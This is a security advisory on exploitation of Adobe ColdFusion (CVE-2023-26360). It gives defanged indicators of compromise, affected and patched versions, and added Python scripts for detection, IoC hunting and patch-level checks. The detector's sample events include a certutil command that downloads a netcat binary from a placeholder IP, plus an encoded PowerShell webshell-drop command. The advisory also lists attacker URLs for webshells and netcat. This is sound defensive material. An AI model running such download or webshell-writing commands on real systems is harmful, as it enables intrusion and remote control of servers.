Adobe ColdFusion zero-day vulnerability exploited
Update – Adobe ColdFusion vulnerability exploited (21st March 2023 at 15:13 UTC)
Overview
Active exploitation of Adobe ColdFusion servers has been detected by cyber security researchers at Rapid7. At the time of writing, the observed intrusions have not been attributed to the recently disclosed Adobe ColdFusion vulnerability tracked as CVE-2023-26360, although a link has not been ruled out.
The reported exploitation dates back to January 2023. Investigations indicate that the threat actor deployed webshells using an encoded PowerShell command that redirected strings into files on disk, a technique for writing a webshell into the web root without transferring a file to the host.
The investigation also identified use of the ‘certutil.exe’ binary with the ‘-urlcache’ flag, a living-off-the-land technique that threat actors use to download files hosted on a remote web server.
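The two behaviours described above (webshells written via an encoded PowerShell command, and certutil.exe used as a downloader) can be hunted for in process-creation telemetry. The following is an added example, not code from the advisory or from Rapid7: it decodes a `-EncodedCommand` payload (base64 of the UTF-16LE script text), flags writes to a ColdFusion web root, and extracts the URL from a `certutil -urlcache` invocation. The sample events are constructed, and the TEST-NET address and file paths in them are placeholders.

```python
import base64
import re

# --- Constructed sample telemetry (not real events) -------------------------
# Each tuple is (event_id, image, command_line), mimicking Sysmon EID 1 / 4688.
PLAIN_DROPPER = (
    r"Set-Content -Path C:\ColdFusion2021\cfusion\wwwroot\wow.txt "
    r'-Value "<cfscript>/* constructed placeholder, not a real webshell */</cfscript>"'
)
# PowerShell -EncodedCommand expects base64 of the UTF-16LE script text.
ENCODED_DROPPER = base64.b64encode(PLAIN_DROPPER.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    (1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     f"powershell.exe -nop -w hidden -enc {ENCODED_DROPPER}"),
    (2, r"C:\Windows\System32\certutil.exe",
     "certutil.exe -urlcache -split -f http://198.51.100.7/dncat.exe dncat.exe"),
    (3, r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -verify -urlfetch C:\certs\server.cer"),            # benign
    (4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -Command Get-Service"),                              # benign
]

# -e, -ec, -enc, -encoded and -encodedcommand are all accepted by powershell.exe.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# A redirection or write cmdlet ...
WRITE_OP = re.compile(r"\b(?:Set-Content|Add-Content|Out-File)\b|>>?", re.I)
# ... targeting a file under a web root with an extension ColdFusion will serve or
# that the actor above used to stage webshells (.txt).
WEB_FILE = re.compile(r"\\(?:wwwroot|webroot|htdocs|CFIDE)\\\S*?\.(?:cfm|cfc|cfml|txt|jsp)\b", re.I)
# certutil's download form: certutil -urlcache [-split] -f <url> <file>
URLCACHE = re.compile(r"certutil(?:\.exe)?\b.*?-urlcache\b.*?(https?://\S+)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded script for an -EncodedCommand invocation, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE
        return None


def webshell_drop_target(script):
    """Return the web-root path being written, or None if no such write is present."""
    if WRITE_OP.search(script):
        m = WEB_FILE.search(script)
        if m:
            return m.group(0)
    return None


def certutil_download(cmdline):
    """Return the URL fetched via certutil -urlcache, or None."""
    m = URLCACHE.search(cmdline)
    return m.group(1) if m else None


def analyse(events):
    """Run the three rules over (event_id, image, command_line) tuples."""
    findings = []
    for event_id, _image, cmdline in events:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append({"event": event_id, "rule": "encoded_powershell", "detail": decoded})
        # Inspect the decoded script if there was one, otherwise the raw command line.
        target = webshell_drop_target(decoded if decoded is not None else cmdline)
        if target:
            findings.append({"event": event_id, "rule": "webshell_write_to_webroot", "detail": target})
        url = certutil_download(cmdline)
        if url:
            findings.append({"event": event_id, "rule": "certutil_urlcache_download", "detail": url})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']} -> {f['detail']}")
```

Decoding before matching matters: the web-root path is invisible in the raw command line of event 1, so a rule that only inspects the encoded string would miss the webshell write. The `-urlfetch` event is deliberately included to show that the certutil rule keys on `-urlcache` rather than on the binary name alone.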
Updated Indicators of Compromise
Network indicators:
– www.av-iq[.]com – FQDN
– www.ooshirts[.]com – FQDN
– hXXps://www.av-iq[.]com/wow.txt – URL
– hXXps://www.ooshirts[.]com/images/zzz.txt – URL
– hXXps://www.ooshirts[.]com/images/dncat.exe – URL
– hXXp://www.ooshirts[.]com/images/nc.exe – URL
File hashes (SHA-256):
– e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245
– 2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25
– 03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3
– be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148
– ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419
– 213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0
File hashes (SHA-1):
– dac7867ee642a65262e153147552befb0b45b036
– 5d95fb365b9d0ceb568bb0c75cb1d70707723f27
File hashes (MD5):
– 1edf1d653deb9001565b5eff3e50824a
– 470797a25a6b21d0a46f82968fd6a184
Files:
– WOW.TXT – ColdFusion WebShell
– wow.txt – ColdFusion WebShell
– www.txt – ColdFusion WebShell
– www.cfm – ColdFusion WebShell
– wow1.cfm – ColdFusion WebShell
– zzz.txt – ColdFusion WebShell
– dncat.exe – DotNetCat
– nc.exe – NetCat
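The indicators above can be swept for on a ColdFusion host. The following is an added example (not the advisory's own tooling) that walks a web root, hashes every file against the SHA-256, SHA-1 and MD5 indicators, flags the listed filenames, and additionally flags CFML tags inside files with non-CFML extensions, since the webshells above were staged as `.txt` files. The sample web root it builds is constructed for illustration; the hash indicators are the ones listed on this page.

```python
import hashlib
import os
import re
import tempfile

# Indicators from the list above.
IOC_SHA256 = {
    "e77d6a10370db19b97cacaeb6662ba79f34087d6eaa46f997ea4956e2ad2f245",
    "2482ab79ecb52e1c820ead170474914761358d3cee16e3377fd6e031d3e6cc25",
    "03b06d600fae4f27f6a008a052ea6ee4274652ab0d0921f97cfa222870b1ddc3",
    "be56f5ed8e577e47fef4e0a287051718599ca040c98b6b107c403b3c9d3ee148",
    "ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419",
    "213079ef54d225c4ca75dd0d57c931bdc613e8c89a2d0dbff88be5b446d231f0",
}
IOC_SHA1 = {"dac7867ee642a65262e153147552befb0b45b036", "5d95fb365b9d0ceb568bb0c75cb1d70707723f27"}
IOC_MD5 = {"1edf1d653deb9001565b5eff3e50824a", "470797a25a6b21d0a46f82968fd6a184"}
# Lower-cased so that WOW.TXT and wow.txt both match.
IOC_FILENAMES = {"wow.txt", "www.txt", "www.cfm", "wow1.cfm", "zzz.txt", "dncat.exe", "nc.exe"}

# CFML tags have no business inside these file types in a web root.
NON_CFML_EXT = {".txt", ".log", ".jpg", ".gif", ".png"}
CFML_TAG = re.compile(rb"<cf(?:execute|script|file|http|query|set)\b", re.I)


def hash_file(path):
    """Return (sha256, sha1, md5) hex digests, reading the file once."""
    h256, h1, hmd = hashlib.sha256(), hashlib.sha1(), hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            for h in (h256, h1, hmd):
                h.update(chunk)
    return h256.hexdigest(), h1.hexdigest(), hmd.hexdigest()


def hunt(root, sha256=IOC_SHA256, sha1=IOC_SHA1, md5=IOC_MD5, names=IOC_FILENAMES):
    """Return sorted [(relative_path, [reasons])] for every file that trips a rule."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if name.lower() in names:
                reasons.append("ioc_filename")
            d256, d1, dmd = hash_file(path)
            if d256 in sha256 or d1 in sha1 or dmd in md5:
                reasons.append("ioc_hash")
            if os.path.splitext(name)[1].lower() in NON_CFML_EXT:
                with open(path, "rb") as fh:
                    if CFML_TAG.search(fh.read(1 << 20)):  # first MiB is enough for a sniff
                        reasons.append("cfml_in_non_cfm_file")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append((rel, reasons))
    return sorted(hits)


def build_sample_webroot():
    """Constructed sample tree (not real artefacts): one benign page, one
    suspicious .txt carrying a CFML tag under the listed name, one plain text file."""
    root = tempfile.mkdtemp(prefix="cf_hunt_")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "index.cfm"), "w") as fh:
        fh.write("<cfoutput>Hello</cfoutput>\n")
    with open(os.path.join(root, "images", "zzz.txt"), "w") as fh:
        fh.write('<cfexecute name="placeholder" />\n')  # constructed placeholder tag only
    with open(os.path.join(root, "readme.txt"), "w") as fh:
        fh.write("plain text\n")
    return root


if __name__ == "__main__":
    for rel, reasons in hunt(build_sample_webroot()):
        print(rel, ",".join(reasons))
```

Hash matches are the strong signal; a filename hit on `nc.exe` or `www.cfm` alone is a lead to review rather than a confirmed compromise, which is why the function reports the reasons separately instead of a single verdict.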
Updated Mitre Methodologies
Tactic:
– TA0042 – Resource Development
Target Industry
Indiscriminate, opportunistic targeting.
Overview
Severity Level – Critical: Compromise may result in the loss of confidentiality and integrity of data.
A critical arbitrary code execution vulnerability has been disclosed in Adobe ColdFusion. The flaw, tracked as CVE-2023-26360 (CVSSv3 score: 8.6), stems from an Improper Access Control weakness and can be exploited by remote, unauthenticated threat actors in low-complexity attacks. Adobe reported that the vulnerability is being exploited in the wild “in very limited attacks”.
The Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalogue and has given Federal Civilian Executive Branch (FCEB) agencies until 5th April 2023 to apply the relevant updates.
Impact
Successful exploitation of CVE-2023-26360 could allow a threat actor to execute arbitrary code and read arbitrary files on servers running the affected Adobe ColdFusion versions.
Vulnerability Detection
Adobe has released patches for the affected product versions; any installation below the update levels listed under Containment, Mitigations & Remediations should be treated as vulnerable. The installed update level can be confirmed in the ColdFusion Administrator or from the hotfix JARs present under cfusion/lib/updates.
Affected Products
– Adobe ColdFusion 2018: Update 15 and earlier
– Adobe ColdFusion 2021: Update 5 and earlier
It should be noted that CVE-2023-26360 also affects Adobe ColdFusion 2016 and ColdFusion 11 installations, neither of which is supported as both have reached end-of-life (EoL); no patch is available for them and they should be upgraded.
Containment, Mitigations & Remediations
It is strongly recommended that administrators apply the following Adobe updates:
– Adobe ColdFusion 2018: Update 16
– Adobe ColdFusion 2021: Update 6
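The affected and fixed update levels above reduce to a simple check of the installed hotfix level. The following is an added example, not Adobe's tooling: it parses the hotfix JAR names from a ColdFusion `cfusion/lib/updates` directory and classifies the install against the levels in this advisory. It assumes the `chf<version><update>.jar` naming used by ColdFusion 2016, 2018 and 2021 hotfixes (e.g. `chf20210005.jar` for ColdFusion 2021 Update 5); ColdFusion 11 uses a different scheme and must be assessed by hand. The sample directory it builds is constructed.

```python
import os
import re
import tempfile

# Minimum update level containing the fix for CVE-2023-26360 (from this advisory).
FIXED_UPDATE = {2018: 16, 2021: 6}
# Releases the advisory names as affected but end-of-life: no fix will ship.
EOL_VERSIONS = {11, 2016}

# Assumed hotfix naming: chf<YYYY><NNNN>.jar, e.g. chf20180016.jar = CF2018 Update 16.
CHF_JAR = re.compile(r"^chf(\d{4})(\d{4})\.jar$", re.I)


def installed_update_level(updates_dir):
    """Return (version, highest_update) parsed from chf*.jar names, or None if none found."""
    best = None
    for name in os.listdir(updates_dir):
        m = CHF_JAR.match(name)
        if not m:
            continue  # ignore stray files and other naming schemes
        level = (int(m.group(1)), int(m.group(2)))
        if best is None or level > best:
            best = level
    return best


def assess(version, update):
    """Classify an install; update=0 means the base release with no hotfix applied."""
    if version in EOL_VERSIONS:
        return "vulnerable: end-of-life release, no patch available"
    fixed = FIXED_UPDATE.get(version)
    if fixed is None:
        return "unknown: version not covered by this advisory"
    if update >= fixed:
        return "patched"
    return f"vulnerable: Update {update} installed, Update {fixed} required"


def assess_install(updates_dir, version_if_unpatched=None):
    """Assess a ColdFusion install from its updates directory.

    If no hotfix JAR is present the version cannot be inferred from filenames,
    so the caller supplies it and the update level is taken as 0."""
    level = installed_update_level(updates_dir)
    if level is None:
        if version_if_unpatched is None:
            return "unknown: no hotfix JARs found and no version supplied"
        return assess(version_if_unpatched, 0)
    return assess(*level)


def build_sample_updates_dir():
    """Constructed sample: a ColdFusion 2021 install at Update 5 plus a stray file."""
    root = tempfile.mkdtemp(prefix="cf_updates_")
    for n in (3, 4, 5):
        open(os.path.join(root, f"chf2021000{n}.jar"), "wb").close()
    open(os.path.join(root, "readme.txt"), "w").close()
    return root


if __name__ == "__main__":
    d = build_sample_updates_dir()
    print(installed_update_level(d), "->", assess_install(d))
```

A result of `vulnerable` for a 2018 or 2021 install means the corresponding Update 16 or Update 6 has not been applied; for 2016 and 11 the only remediation is an upgrade to a supported release.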
Indicators of Compromise
No specific Indicators of Compromise (IoCs) were available at the time of original publication; the indicators reported since are listed under Updated Indicators of Compromise above.
Threat Landscape
Adobe holds a significant share of the application-development market. Threat actors generally weigh the probability of success against asset value when choosing which attack surfaces to focus on, so widely deployed application-development products such as ColdFusion are prime targets. Because Adobe products are integral to many personal and business operations, threat actors will continue to exploit their vulnerabilities to exfiltrate sensitive data or disrupt business operations.
Threat Group
No attribution to specific threat actors or groups has been identified at the time of writing.
Mitre Methodologies
Tactic:
– TA0004 – Privilege Escalation
Technique:
– T1055.001 – Process Injection: Dynamic-link Library Injection
Common Weakness Enumeration:
– CWE-284 – Improper Access Control
Further Information
Adobe Advisory
AttackerKB Vulnerability Profile